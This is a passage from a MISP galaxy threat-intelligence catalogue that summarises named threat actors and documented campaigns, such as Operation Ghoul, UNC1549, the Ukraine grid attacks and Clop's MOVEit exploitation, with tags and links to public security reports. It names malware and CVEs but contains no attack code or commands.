Operation Ghoul is a profit-driven threat actor that targeted over 130 organizations in 30 countries, primarily in the industrial and engineering sectors. They employed high-quality social engineering techniques, such as spear-phishing emails disguised as payment advice from a UAE bank, to distribute malware. The group’s main motivation is financial gain through the sale of stolen intellectual property and business intelligence, as well as attacks on banking accounts. Their attacks were effective, particularly against companies that were unprepared to detect them.

The tag is: misp-galaxy:threat-actor="Operation Ghoul"

Table 12376. Table References

Links

https://securelist.com/kaspersky-security-bulletin-2016-executive-summary/76858/

https://securelist.com/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/75718/

CardinalLizard

CardinalLizard, a cyber threat actor linked to China, has targeted entities in Asia since 2018. Their methods include spear-phishing, custom malware with anti-detection features, and potentially shared infrastructure with other actors.

The tag is: misp-galaxy:threat-actor="CardinalLizard"

Table 12377. Table References

Links

https://securelist.com/apt-review-of-the-year/89117/

Ferocious Kitten

Ferocious Kitten is an APT group that has been active against Persian-speaking individuals since 2015 and appears to be based in Iran. Although it has been active over a large timespan, the group has mostly operated under the radar until a lure document was uploaded to VirusTotal and was brought to public knowledge by researchers on Twitter. Subsequently, one of its implants was analyzed by a Chinese intelligence firm. Kaspersky then expanded some of the findings on the group and provided insights on additional variants. The malware dropped from the aforementioned document is dubbed MarkiRAT and is used to record keystrokes and clipboard content, provide file download and upload capabilities as well as the ability to execute arbitrary commands on the victims machine. Kaspersky were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method. Interestingly, some of the TTPs used by this threat actor are reminiscent of other groups operating in the domain of dissident surveillance. For example, it used the same C2 domains across its implants for years, which was witnessed in the activity of Domestic Kitten. In the same vein, the Telegram execution hijacking technique observed in this campaign by Ferocious Kitten was also observed being used by Rampant Kitten, as covered by Check Point.

The tag is: misp-galaxy:threat-actor="Ferocious Kitten"

Table 12378. Table References

Links

https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/

Operation Red Signature

The threat actors compromised the update server of a remote support solutions provider to deliver a remote access tool called 9002 RAT to their targets of interest through the update process. They carried this out by first stealing the company’s certificate then using it to sign the malware. They also configured the update server to only deliver malicious files if the client is located in the range of IP addresses of their target organisations.

The tag is: misp-galaxy:threat-actor="Operation Red Signature"

Table 12379. Table References

Links

https://decoded.avast.io/threatintel/avast-finds-backdoor-on-us-government-commission-network/?utm_source=rss&utm_medium=rss&utm_campaign=avast-finds-backdoor-on-us-government-commission-network

https://www.trendmicro.com/en_my/research/18/h/supply-chain-attack-operation-red-signature-targets-south-korean-organizations.html

Earth Yako

Earth Yako is a threat actor that has been actively targeting researchers in academic organizations and think tanks in Japan. They use spearphishing emails with malicious attachments to gain initial access to their targets' systems. Earth Yako’s objectives and patterns suggest a possible connection to a Chinese APT group, but conclusive proof of their nationality is lacking. They have been observed using various malware delivery methods and techniques, such as the use of Winword.exe for DLL Hijacking.

The tag is: misp-galaxy:threat-actor="Earth Yako"

Earth Yako is also known as:

  • Operation RestyLink

  • Enelink

Table 12380. Table References

Links

https://www.trendmicro.com/en_us/research/23/b/invitation-to-secret-event-uncovering-earth-yako-campaigns.html

Urpage

What sets Urpage attacks apart is its targeting of InPage, a word processor for Urdu and Arabic languages. However, its Delphi backdoor component, which it has in common with Confucius and Patchwork, and its apparent use of Bahamut-like malware, is what makes it more intriguing as it connects Urpage to these other known threats. Trend Micro covered the Delphi component in the context of the Confucius and Patchwork connection. They mentioned Urpage as a third unnamed threat actor connected to the two.

The tag is: misp-galaxy:threat-actor="Urpage"

Table 12381. Table References

Links

https://www.trendmicro.com/en_us/research/18/h/the-urpage-connection-to-bahamut-confucius-and-patchwork.html

Operation Emmental

Operation Emmental, also known as the Retefe gang, is a threat actor group that has been active since at least 2012. They primarily target customers of banks in countries such as Austria, Sweden, Switzerland, and Japan. The group has developed sophisticated malware, including a Mac alternative called Dok, to bypass two-factor authentication and hijack network traffic. They have also been observed using phishing emails to spread their malware. The group is believed to be Russian-speaking and has continuously improved their malicious codes over the years.

The tag is: misp-galaxy:threat-actor="Operation Emmental"

Operation Emmental is also known as:

  • Retefe Gang

  • Retefe Group

Table 12382. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/osx_dok-mac-malware-emmental-hijacks-user-network-traffic/

TA2725

TA2725 is a threat actor that has been tracked since March 2022. They primarily target organizations in Brazil and Mexico using Brazilian banking malware and phishing techniques. Recently, they have expanded their operations to also target victims in Spain and Mexico simultaneously. TA2725 typically uses GoDaddy virtual hosting for their URL redirector and hosts malicious files on legitimate cloud hosting providers like Amazon AWS, Google Cloud, or Microsoft Azure. They have been known to spoof legitimate companies, such as ÉSECÈ Group, to deceive their victims.

The tag is: misp-galaxy:threat-actor="TA2725"

Table 12383. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/copacabana-barcelona-cross-continental-threat-brazilian-banking-malware

Blackatom

Recent campaigns suggest Hamas-linked actors may be advancing their TTPs to include intricate social engineering lures specially crafted to appeal to a niche group of high value targets. In September 2023, a Palestine-based group likely linked to Hamas targeted Israeli software engineers using an elaborate social engineering ruse that ultimately installed malware and stole cookies. The attackers, which Google’s Threat Analysis Group (TAG) tracks as BLACKATOM, posed as employees of legitimate companies and reached out via LinkedIn to invite targets to apply for software development freelance opportunities. Targets included software engineers in the Israeli military, as well as Israel’s aerospace and defense industry

The tag is: misp-galaxy:threat-actor="Blackatom"

Table 12384. Table References

Links

https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf

BANISHED KITTEN

BANISHED KITTEN is an Iranian state-nexus adversary active since at least 2008. While the adversary’s most prominent activity is the July and September 2022 disruptive attacks targeting Albanian government infrastructure and the use of the HomelandJustice persona to leak stolen data, BANISHED KITTEN has likely targeted dissidents using the AllinOneNeo malware family.

The tag is: misp-galaxy:threat-actor="BANISHED KITTEN"

BANISHED KITTEN is also known as:

  • DUNE

  • Storm-0842

Table 12385. Table References

Links

https://www.crowdstrike.com/adversaries/banished-kitten/

https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf

ProCC

ProCC is a threat actor targeting the hospitality sector with remote access Trojan malware. They use email attachments to exploit vulnerabilities like CVE-2017-0199 and deploy customized versions of RATs such as RevengeRAT, NjRAT, NanoCoreRAT, and 888 RAT. ProCC’s malware is capable of collecting data from the clipboard and printer spooler, as well as capturing screenshots on infected machines.

The tag is: misp-galaxy:threat-actor="ProCC"

Table 12386. Table References

Links

https://securelist.com/revengehotels/95229/

ResumeLooters

Since the beginning of 2023, ResumeLooters have been able to compromise at least 65 websites. The group employs a variety of simple techniques, including SQL injection and XSS. The threat actor attempted to insert XSS scripts into all available forms, aiming to execute it on the administrators’ device to obtain admin credentials. While the group was able to execute the XSS script on some visitors’ devices with administrative access, allowing ResumeLooters to steal the HTML code of the pages the victims were visiting, Group-IB did not find any confirmation of admin credential thefts.

The tag is: misp-galaxy:threat-actor="ResumeLooters"

Table 12387. Table References

Links

https://www.group-ib.com/blog/resumelooters/

ShadowSyndicate

ShadowSyndicate is a threat actor associated with various ransomware groups, using a consistent Secure Shell fingerprint across multiple servers. They have been linked to ransomware families such as Quantum, Nokoyawa, and ALPHV. ShadowSyndicate’s infrastructure overlaps with that of Cl0p, suggesting potential connections between the two groups. Their activities indicate they may be a Ransomware-as-a-Service affiliate.

The tag is: misp-galaxy:threat-actor="ShadowSyndicate"

Table 12388. Table References

Links

https://www.group-ib.com/blog/shadowsyndicate-raas/

LabHost

LabHost is a threat actor group targeting Canadian Banks with Phishing-as-a-Service attacks. They have been observed using tools like LabRat and LabSend for real-time campaign management and SMS lures. LabHost’s phishing campaigns have similarities to Frappo campaigns, but they operate separately and offer different subscription packages.

The tag is: misp-galaxy:threat-actor="LabHost"

Table 12389. Table References

Links

https://www.phishlabs.com/blog/phishing-service-profile-labhost-threat-actor-group

Cyber.Anarchy.Squad

Cyber Anarchy Squad is a pro-Ukrainian hacktivist group known for targeting Russian companies and infrastructure. They have carried out cyberattacks on Russian telecom providers, financial institutions, and government agencies, causing disruptions to services and leaking stolen data. The group has used techniques such as wiping network equipment, defacing websites, and leaking sensitive documents to support their cause. Cyber Anarchy Squad has been active for at least four years, evolving from cyber-bullying to more sophisticated hacking activities.

The tag is: misp-galaxy:threat-actor="Cyber.Anarchy.Squad"

Cyber.Anarchy.Squad is also known as:

  • Cyber Anarchy Squad

Table 12390. Table References

Links

https://srslyriskybiz.substack.com/p/russias-extradition-wars-are-not

https://therecord.media/proukraine-hackers-claim-to-take-down-russian-isp

GoldFactory

GoldFactory is a threat actor group attributed to developing sophisticated mobile banking malware targeting victims primarily in the Asia-Pacific region, specifically Vietnam and Thailand. They utilize social engineering to deliver malware to victims' devices and have close connections to the Gigabud malware family. GoldFactory’s Trojans, such as GoldPickaxe and GoldDigger, employ tactics like smishing, phishing, and fake login screens to compromise victims' phones and steal sensitive information. Their evolving malware suite demonstrates a high level of operational maturity and ingenuity, requiring a proactive and multi-faceted cybersecurity approach to detect and mitigate their threats.

The tag is: misp-galaxy:threat-actor="GoldFactory"

Table 12391. Table References

Links

https://www.group-ib.com/blog/goldfactory-ios-trojan/

SPIKEDWINE

SPIKEDWINE is a threat actor targeting European officials with a new backdoor called WINELOADER. They use a bait PDF document posing as an invitation letter from the Ambassador of India to lure diplomats. The attack is characterized by advanced tactics, techniques, and procedures in the malware and command and control infrastructure. The motivation behind the attacks seems to be exploiting the geopolitical relations between India and European nations.

The tag is: misp-galaxy:threat-actor="SPIKEDWINE"

Table 12392. Table References

Links

https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader

UAC-0184

UAC-0184 is a threat actor targeting Ukrainian organizations in Finland, using the Remcos Remote Access Trojan in their attacks. They have been observed utilizing steganographic image files and the IDAT Loader to deliver the malware. The group has targeted the Armed Forces of Ukraine and impersonated military recruitment processes to infect systems with the Remcos RAT.

The tag is: misp-galaxy:threat-actor="UAC-0184"

Table 12393. Table References

Links

https://blog.morphisec.com/unveiling-uac-0184-the-remcos-rat-steganography-saga

https://cert.gov.ua/article/6276988

UNC1549

UNC1549 is an Iranian threat actor linked to Tortoiseshell and potentially the IRGC. They have been active since at least June 2022, targeting entities worldwide with a focus on the Middle East. UNC1549 uses spear-phishing and credential harvesting for initial access, deploying custom malware like MINIBIKE and MINIBUS backdoors. They have also been observed using evasion techniques and a tunneler named LIGHTRAIL in their operations.

The tag is: misp-galaxy:threat-actor="UNC1549"

Table 12394. Table References

Links

https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east

Mogilevich

Mogilevich is a ransomware group known for claiming to breach organizations like Epic Games and Ireland’s Department of Foreign Affairs, offering stolen data for sale without providing proof of the attacks. They operate as an extortion group, targeting high-profile victims and demanding payment for the data they claim to have stolen. Despite their claims, security researchers have noted that Mogilevich’s tactics and website design suggest they may not be a sophisticated threat actor.

The tag is: misp-galaxy:threat-actor="Mogilevich"

Table 12395. Table References

Links

https://therecord.media/ireland-dfa-no-evidence-of-cybersecurity-breach

https://www.bleepingcomputer.com/news/security/epic-games-zero-evidence-we-were-hacked-by-mogilevich-gang/

R00tK1T

R00TK1T is a hacking group known for sophisticated cyber attacks targeting governmental agencies in Malaysia, including data exfiltration from the National Population and Family Development Board. The group has publicized their successful attacks on social media, showcasing stolen data. R00TK1T has also targeted Malaysian telecom providers, defacing portals and potentially breaching user data.

The tag is: misp-galaxy:threat-actor="R00tK1T"

Table 12396. Table References

Links

https://logrhythm.com/blog/how-government-agencies-can-defend-against-exfiltration-tactics/

https://cyble.com/blog/cyble-chronicles-february-1-latest-findings-recommendations-for-the-cybersecurity-community/

Tidal Campaigns

Tidal Campaigns Cluster.

Tidal Campaigns is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Tidal Cyber

2015 Ukraine Electric Power Attack

[2015 Ukraine Electric Power Attack](https://app.tidalcyber.com/campaigns/96e367d0-a744-5b63-85ec-595f505248a3) was a [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) campaign during which they used [BlackEnergy](https://app.tidalcyber.com/software/908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f) (specifically BlackEnergy3) and [KillDisk](https://app.tidalcyber.com/software/b5532e91-d267-4819-a05d-8c5358995add) to target and disrupt transmission and distribution substations within the Ukrainian power grid. This campaign was the first major public attack conducted against the Ukrainian power grid by Sandworm Team.

The tag is: misp-galaxy:campaigns="2015 Ukraine Electric Power Attack"

2016 Ukraine Electric Power Attack

[2016 Ukraine Electric Power Attack](https://app.tidalcyber.com/campaigns/06197e03-e1c1-56af-ba98-5071f98f91f1) was a [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) campaign during which they used [Industroyer](https://app.tidalcyber.com/software/09398a7c-aee5-44af-b99d-f73d3b39c299) malware to target and disrupt distribution substations within the Ukrainian power grid. This campaign was the second major public attack conducted against Ukraine by [Sandworm Team]([ESET Industroyer(https://app.tidalcyber.com/references/9197f712-3c53-4746-9722-30e248511611)]</sup><sup>[[Dragos Crashoverride 2018](https://app.tidalcyber.com/references/d14442d5-2557-4a92-9a29-b15a20752f56)]</sup>

The tag is: misp-galaxy:campaigns="2016 Ukraine Electric Power Attack"

2023 Increased Truebot Activity

In July 2023, U.S. authorities released joint Cybersecurity Advisory AA23-187A, which detailed increased observations of new variants of the Truebot botnet malware infecting organizations in the United States and Canada. Authorities assessed that Truebot infections are primarily motivated around collection and exfiltration of sensitive victim data for financial gain. Officials also assessed that actors were using both spearphishing emails containing malicious hyperlinks and exploitation of CVE-2022-31199 in the IT system auditing application Netwrix Auditor to deliver Truebot during these attacks. Additional tools associated with the attacks included Raspberry Robin for initial infections, FlawedGrace and Cobalt Strike for various post-exploitation activities, and Teleport, a custom tool for data exfiltration.<sup>[[U.S. CISA Increased Truebot Activity July 6 2023](/references/6f9b8f72-c55f-4268-903e-1f8a82efa5bb)]</sup>

The Advisory did not provide specific impacted victim sectors. The Advisory referred to activity taking place “in recent months” prior to July 2023 but did not provide an estimated date when the summarized activity began. A public threat report referenced in the Advisory reported an observed increase in Truebot infections beginning in August 2022, including several compromises involving education sector organizations.<sup>[[U.S. CISA Increased Truebot Activity July 6 2023](/references/6f9b8f72-c55f-4268-903e-1f8a82efa5bb)]</sup><sup>[[Cisco Talos Blog December 08 2022](/references/bcf92374-48a3-480f-a679-9fd34b67bcdd)]</sup>

Related Vulnerabilities: CVE-2022-31199<sup>[[U.S. CISA Increased Truebot Activity July 6 2023](/references/6f9b8f72-c55f-4268-903e-1f8a82efa5bb)]</sup>

The tag is: misp-galaxy:campaigns="2023 Increased Truebot Activity"

2023 Ivanti EPMM APT Vulnerability Exploits

In August 2023, U.S. Cybersecurity & Infrastructure Security Agency (CISA) and Norwegian National Cyber Security Centre (NCSC-NO) authorities released Cybersecurity Advisory AA23-213A, which detailed observed exploitation of two vulnerabilities, CVE-2023-35078 and CVE-2023-35081, affecting Ivanti Endpoint Manager Mobile (EPMM), a solution which provides elevated access to an organization’s mobile devices. According to the Advisory, authorities observed unspecified advanced persistent threat (APT) actors exploiting CVE-2023-35078 as a zero-day from at least April 2023 in order to gather information from unspecified organizations in Norway, and to gain initial access to a Norwegian government agency.

Ivanti released a CVE-2023-35078 patch on July 23, but then determined that CVE-2023-35081 could be chained together with the first vulnerability, a process which can enable arbitrary upload and execution of actor files, such as web shells. Ivanti released a CVE-2023-35081 patch on July 28. The Advisory provided mitigation recommendations, vulnerability and compromise identification methods, and incident response guidance, which can be found in the [source report]([U.S. CISA CVE-2023-35078 Exploits(/references/62305b8a-76c8-49ec-82dc-6756643ccf7a)]</sup>

Related Vulnerabilities: CVE-2023-35078<sup>[[U.S. CISA CVE-2023-35078 Exploits](/references/62305b8a-76c8-49ec-82dc-6756643ccf7a)]</sup>, CVE-2023-35081<sup>[[U.S. CISA CVE-2023-35078 Exploits](/references/62305b8a-76c8-49ec-82dc-6756643ccf7a)]</sup>

The tag is: misp-galaxy:campaigns="2023 Ivanti EPMM APT Vulnerability Exploits"

2023 Zoho ManageEngine APT Exploits

In September 2023, U.S. cybersecurity authorities released Cybersecurity Advisory AA23-250A, which detailed multiple intrusions in early 2023 involving an aeronautical sector organization and attributed to multiple unspecified “nation-state advanced persistent threat (APT) actors”. As early as January, one set of actors exploited CVE-2022-47966, a vulnerability in the Zoho ManageEngine ServiceDesk Plus IT service management application that allows remote code execution, to access the organization’s public-facing web servers. A separate set of actors was also observed exploiting CVE-2022-42475, a vulnerability in Fortinet, Inc.’s FortiOS SSL-VPN that also allows remote code execution, to gain access to the organization’s firewall devices.

After gaining access, the actors downloaded malware, performed network discovery, collected administrator credentials, and moved laterally, but according to the advisory, unclear data storage records inhibited insight into whether any proprietary information was accessed, altered, or exfiltrated. A common behavior among both sets of actors was log deletion from critical servers and the use of disabled, legitimate administrator credentials, which in one case belonged to a previously employed contractor (the organization confirmed the credentials were disabled before the observed threat activity).<sup>[[U.S. CISA Zoho Exploits September 7 2023](/references/6bb581e8-ed0e-41fe-bf95-49b5d11b4e6b)]</sup>

In addition to behavioral observations and indicators of compromise, the Advisory provided detection and mitigation guidance, which can be found in the [source report](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-250a).

Related Vulnerabilities: CVE-2022-47966, CVE-2022-42475, CVE-2021-44228<sup>[[U.S. CISA Zoho Exploits September 7 2023](/references/6bb581e8-ed0e-41fe-bf95-49b5d11b4e6b)]</sup>

The tag is: misp-galaxy:campaigns="2023 Zoho ManageEngine APT Exploits"

APT28 Cisco Router Exploits

In April 2023, U.S. and UK cybersecurity authorities released joint Cybersecurity Advisory AA23-108, which detailed a campaign by Russia-backed APT28 to compromise vulnerable routers running Cisco Internetworking Operating System (IOS). Actors collected device information and conducted further network reconnaissance on victims “worldwide”, including U.S. government institutions, 250 Ukrainian entities, and “a small number” of victims elsewhere in Europe. Adversary activity occurred over an unspecified timeframe in 2021.

Actors exploited CVE-2017-6742, a Simple Network Management Protocol (SNMP) vulnerability for which Cisco released a patch in 2017, and used default authentication strings to gain initial access to devices and subsequently gather router information, such as router interface details. In some cases, authorities observed actors deploying Jaguar Tooth, a malicious software bundle consisting of a series of payloads and patches. Jaguar Tooth deployments allowed actors to collect further device information via execution of Cisco IOS Command Line Interface commands, discover other network devices, and achieve unauthenticated, backdoor access to victim systems.<sup>[[U.S. CISA APT28 Cisco Routers April 18 2023](/references/c532a6fc-b27f-4240-a071-3eaa866bce89)]</sup>

In addition to behavioral observations, the Advisory also provided mitigation recommendations and indicators of compromise, which can be found in the [source report](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-108).

Related Vulnerabilities: CVE-2017-6742<sup>[[U.S. CISA APT28 Cisco Routers April 18 2023](/references/c532a6fc-b27f-4240-a071-3eaa866bce89)]</sup>

The tag is: misp-galaxy:campaigns="APT28 Cisco Router Exploits"

APT28 Router Compromise Attacks

U.S. authorities and various international partners released joint cybersecurity advisory AA20-150A, which detailed a series of attacks linked to APT28 that leveraged compromised Ubiquiti EdgeRouters to facilitate the attacks. Actors used the network of compromised routers for a range of malicious activities, including harvesting credentials, proxying network traffic, and hosting fake landing pages and post-exploitation tools. Attacks targeted organizations in a wide range of sectors around the world.<sup>[[U.S. Federal Bureau of Investigation 2 27 2024](/references/962fb031-dfd1-43a7-8202-3a2231b0472b)]</sup> According to a separate U.S. Justice Department announcement, the botnet involved in these attacks differed from previous APT28-linked cases, since nation-state actors accessed routers that had been initially compromised by a separate, unspecified cybercriminal group.<sup>[[U.S. Justice Department GRU Botnet February 2024](/references/26a554dc-39c0-4638-902d-7e84fe01b961)]</sup>

The tag is: misp-galaxy:campaigns="APT28 Router Compromise Attacks"

APT29 Cloud TTP Evolution

UK cybersecurity authorities and international partners published Cybersecurity Advisory AA24-057A (February 2024), which detailed recent tactics, techniques, and procedures (TTPs) used by Russian state-backed adversary group APT29 to target cloud environments. The advisory indicated that as more government agencies and enterprises move elements of their operations to cloud infrastructure, APT29 actors have especially adapted their TTPs for gaining initial access into these cloud environments.<sup>[[U.S. CISA APT29 Cloud Access](/references/e9e08eca-1e01-4ff0-a8ef-49ecf66aaf3d)]</sup>

The tag is: misp-galaxy:campaigns="APT29 Cloud TTP Evolution"

APT29 TeamCity Exploits

Operationalize this intelligence by pivoting to relevant defensive resources via the Techniques below. Alternatively, use the Add to Matrix button above, then overlay entire sets of capabilities from your own defensive stack to identify threat overlaps & potential gaps (watch a [60-second tutorial here](https://www.youtube.com/watch?v=4jBo3XLO01E)).

In December 2023, U.S. cybersecurity authorities and international partners released Cybersecurity Advisory AA23-347A, which detailed large-scale observed exploitation of CVE-2023-42793 since September 2023 by cyber threat actors associated with Russia’s Foreign Intelligence Service (SVR). According to the advisory, these actors are also known as APT29, the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard.

CVE-2023-42793 is an authentication bypass vulnerability in the JetBrains TeamCity software development program. After exploiting the vulnerability to gain access into victim networks, SVR actors were then observed escalating privileges, moving laterally, and deploying additional backdoors in an apparent effort to maintain long-term persistent access to victim environments. The advisory noted how SVR actors used access gained during the 2020 compromise of SolarWinds, another software company, to conduct supply chain operations affecting SolarWinds customers, but it also noted that such activity has not been observed in this case to date.

JetBrains released a patch for CVE-2023-42793 in September 2023. The advisory indicated that the compromises observed to date appear to be opportunistic, impacting unpatched, internet-accessible TeamCity servers. “A few dozen” compromised entities have been identified so far (companies in disparate sectors in the United States, Europe, Asia, and Australia), but authorities assess that this tally does not represent the full number of compromised victims. Indicators of compromise, mitigation guidance, and detection resources – including Sigma and YARA rules – can be found in the [source report]([U.S. CISA SVR TeamCity Exploits December 2023(/references/5f66f864-58c2-4b41-8011-61f954e04b7e)]</sup>

The tag is: misp-galaxy:campaigns="APT29 TeamCity Exploits"

C0010

[C0010](https://app.tidalcyber.com/campaigns/a1e33caf-6eb0-442f-b97a-f6042f21df48) was a cyber espionage campaign conducted by UNC3890 that targeted Israeli shipping, government, aviation, energy, and healthcare organizations. Security researcher assess UNC3890 conducts operations in support of Iranian interests, and noted several limited technical connections to Iran, including PDB strings and Farsi language artifacts. [C0010](https://app.tidalcyber.com/campaigns/a1e33caf-6eb0-442f-b97a-f6042f21df48) began by at least late 2020, and was still ongoing as of mid-2022.<sup>[[Mandiant UNC3890 Aug 2022](https://app.tidalcyber.com/references/7b3fda0b-d327-4f02-bebe-2b8974f9959d)]</sup>

The tag is: misp-galaxy:campaigns="C0010"

C0011

[C0011](https://app.tidalcyber.com/campaigns/4c7386a7-9741-4ae4-8ad9-def03ed77e29) was a suspected cyber espionage campaign conducted by [Transparent Tribe](https://app.tidalcyber.com/groups/441b91d1-256a-4763-bac6-8f1c76764a25) that targeted students at universities and colleges in India. Security researchers noted this campaign against students was a significant shift from [Transparent Tribe](https://app.tidalcyber.com/groups/441b91d1-256a-4763-bac6-8f1c76764a25)'s historic targeting Indian government, military, and think tank personnel, and assessed it was still ongoing as of July 2022.<sup>[[Cisco Talos Transparent Tribe Education Campaign July 2022](https://app.tidalcyber.com/references/acb10fb6-608f-44d3-9faf-7e577b0e2786)]</sup>

The tag is: misp-galaxy:campaigns="C0011"

C0015

[C0015](https://app.tidalcyber.com/campaigns/85bbff82-ba0c-4193-a3b5-985afd5690c5) was a ransomware intrusion during which the unidentified attackers used [Bazar](https://app.tidalcyber.com/software/b35d9817-6ead-4dbd-a2fa-4b8e217f8eac), [Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6), and [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5), along with other tools, over a 5 day period. Security researchers assessed the actors likely used the widely-circulated [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) ransomware playbook based on the observed pattern of activity and operator errors.<sup>[[DFIR Conti Bazar Nov 2021](https://app.tidalcyber.com/references/a6f1a15d-448b-41d4-81f0-ee445cba83bd)]</sup>

The tag is: misp-galaxy:campaigns="C0015"

C0017

[C0017](https://app.tidalcyber.com/campaigns/a56d7700-c015-52ca-9c52-fed4d122c100) was an [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) campaign conducted between May 2021 and February 2022 that successfully compromised at least six U.S. state government networks through the exploitation of vulnerable Internet facing web applications. During [C0017](https://app.tidalcyber.com/campaigns/a56d7700-c015-52ca-9c52-fed4d122c100), [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) was quick to adapt and use publicly-disclosed as well as zero-day vulnerabilities for initial access, and in at least two cases re-compromised victims following remediation efforts. The goals of [C0017](https://app.tidalcyber.com/campaigns/a56d7700-c015-52ca-9c52-fed4d122c100) are unknown, however [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) was observed exfiltrating Personal Identifiable Information (PII).<sup>[[Mandiant APT41](https://app.tidalcyber.com/references/e54415fe-40c2-55ff-9e75-881bc8a912b8)]</sup>

The tag is: misp-galaxy:campaigns="C0017"

C0018

[C0018](https://app.tidalcyber.com/campaigns/0452e367-aaa4-5a18-8028-a7ee136fe646) was a month-long ransomware intrusion that successfully deployed [AvosLocker](https://app.tidalcyber.com/software/e792dc8d-b0f4-5916-8850-a61ff53125d0) onto a compromised network. The unidentified actors gained initial access to the victim network through an exposed server and used a variety of open-source tools prior to executing [AvosLocker]([Costa AvosLocker May 2022(https://app.tidalcyber.com/references/a94268d8-6b7c-574b-a588-d8fd80c27fd3)]</sup><sup>[[Cisco Talos Avos Jun 2022](https://app.tidalcyber.com/references/1170fdc2-6d8e-5b60-bf9e-ca915790e534)]</sup>

The tag is: misp-galaxy:campaigns="C0018"

C0021

[C0021](https://app.tidalcyber.com/campaigns/86bed8da-4cab-55fe-a2d0-9214db1a09cf) was a spearphishing campaign conducted in November 2018 that targeted public sector institutions, non-governmental organizations (NGOs), educational institutions, and private-sector corporations in the oil and gas, chemical, and hospitality industries. The majority of targets were located in the US, particularly in and around Washington D.C., with other targets located in Europe, Hong Kong, India, and Canada. [C0021](https://app.tidalcyber.com/campaigns/86bed8da-4cab-55fe-a2d0-9214db1a09cf)'s technical artifacts, tactics, techniques, and procedures (TTPs), and targeting overlap with previous suspected [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) activity.<sup>[[Microsoft Unidentified Dec 2018](https://app.tidalcyber.com/references/896c88f9-8765-4b60-b679-667b338757e3)]</sup><sup>[[FireEye APT29 Nov 2018](https://app.tidalcyber.com/references/30e769e0-4552-429b-b16e-27830d42edea)]</sup>

The tag is: misp-galaxy:campaigns="C0021"

C0026

[C0026](https://app.tidalcyber.com/campaigns/41f283a1-b2ac-547d-98d5-ff907afd08c7) was a campaign identified in September 2022 that included the selective distribution of [KOPILUWAK](https://app.tidalcyber.com/software/d09c4459-1aa3-547d-99f4-7ac73b8043f0) and [QUIETCANARY](https://app.tidalcyber.com/software/52d3515c-5184-5257-bf24-56adccb4cccd) malware to previous [ANDROMEDA](https://app.tidalcyber.com/software/69aac793-9e6a-5167-bc62-823189ee2f7b) malware victims in Ukraine through re-registered [ANDROMEDA](https://app.tidalcyber.com/software/69aac793-9e6a-5167-bc62-823189ee2f7b) C2 domains. Several tools and tactics used during [C0026](https://app.tidalcyber.com/campaigns/41f283a1-b2ac-547d-98d5-ff907afd08c7) were consistent with historic [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) operations.<sup>[[Mandiant Suspected Turla Campaign February 2023](https://app.tidalcyber.com/references/d8f43a52-a59e-5567-8259-821b1b6bde43)]</sup>

The tag is: misp-galaxy:campaigns="C0026"

C0027

[C0027](https://app.tidalcyber.com/campaigns/a9719584-4f52-5a5d-b0f7-1059e715c2b8) was a financially-motivated campaign linked to [Scattered Spider](https://app.tidalcyber.com/groups/3d77fb6c-cfb4-5563-b0be-7aa1ad535337) that targeted telecommunications and business process outsourcing (BPO) companies from at least June through December of 2022. During [C0027](https://app.tidalcyber.com/campaigns/a9719584-4f52-5a5d-b0f7-1059e715c2b8) [Scattered Spider](https://app.tidalcyber.com/groups/3d77fb6c-cfb4-5563-b0be-7aa1ad535337) used various forms of social engineering, performed SIM swapping, and attempted to leverage access from victim environments to mobile carrier networks.<sup>[[Crowdstrike TELCO BPO Campaign December 2022](https://app.tidalcyber.com/references/382785e1-4ef3-506e-b74f-cd07df9ae46e)]</sup>

The tag is: misp-galaxy:campaigns="C0027"

Clop MOVEit Transfer Vulnerability Exploitation

In June 2023, U.S. authorities released Cybersecurity Advisory AA23-158A, which detailed observed exploits of a zero-day SQL injection vulnerability (CVE-2023-34362) affecting Progress Software’s managed file transfer (MFT) solution, MOVEit Transfer. According to the Advisory, exploit activity began on May 27, 2023, as threat actors, which the Advisory attributed to "CL0P Ransomware Gang, also known as TA505", began compromising internet-facing MOVEit Transfer web applications. Actors deployed web shells, dubbed LEMURLOOT, on compromised MOVEit applications, which enabled persistence, discovery of files and folders stored on MOVEit servers, and staging and exfiltration of compressed victim data. Authorities indicated they expected to see "widespread exploitation of unpatched software services in both private and public networks".<sup>[[U.S. CISA CL0P CVE-2023-34362 Exploitation](/references/07e48ca8-b965-4234-b04a-dfad45d58b22)]</sup> Progress Software acknowledged the vulnerability and issued guidance on known affected versions, software upgrades, and patching.<sup>[[Progress Software MOVEit Transfer Critical Vulnerability](/references/9f364e22-b73c-4f3a-902c-a3f0eb01a2b9)]</sup>

Related Vulnerabilities: CVE-2023-34362<sup>[[U.S. CISA CL0P CVE-2023-34362 Exploitation](/references/07e48ca8-b965-4234-b04a-dfad45d58b22)]</sup>

